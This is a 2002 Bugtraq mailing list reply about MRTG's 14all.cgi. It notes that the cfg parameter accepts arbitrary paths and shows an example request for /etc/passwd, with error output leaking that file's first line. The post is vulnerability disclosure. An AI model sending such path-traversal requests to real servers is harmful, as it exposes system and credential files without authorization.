Bugtraq mailing list archives
Re: Mrtg Path Disclosure Vulnerability
From: "Jason Hicks" <HicksJ () NATFUEL COM>
Date: Fri, 08 Feb 2002 11:28:22 -0500
Actually, it does not display the webroot directory... it lists the location where 14all.cgi is configured to look for the config files. In your case that may be the webroot, but not in mine. BUT... Better yet, 14all.cgi allows (accepts) path entries in the web request... (a slight no no) Example: http://mrtghost/cgi-bin/14all.cgi?cfg=/etc/passwd Anyone care to guess what this returns? }Software error: }ERROR: CFG Error Unknown Option "root:x:0:0:root:/root" on line 2 or }above. Check doc/reference.txt for Help } }For help, please send mail to the webmaster (x), giving }this error message and the time and date of the error. Luckily my /etc/shadow is not readable! :) Nothing like giving away the first line of _any_ readable file on your system.... Jason Hicks Network Architect National Fuel - Buffalo, NY
Current thread:
- Mrtg Path Disclosure Vulnerability Tamer Sahin (Feb 04)
- Re: Mrtg Path Disclosure Vulnerability Barney Wolff (Feb 04)
- Re: Mrtg Path Disclosure Vulnerability Dave Ahmad (Feb 04)
- <Possible follow-ups>
- Re: Mrtg Path Disclosure Vulnerability Frog Man (Feb 04)
- Re: Mrtg Path Disclosure Vulnerability Jason Hicks (Feb 10)
- Re: Mrtg Path Disclosure Vulnerability Barney Wolff (Feb 04)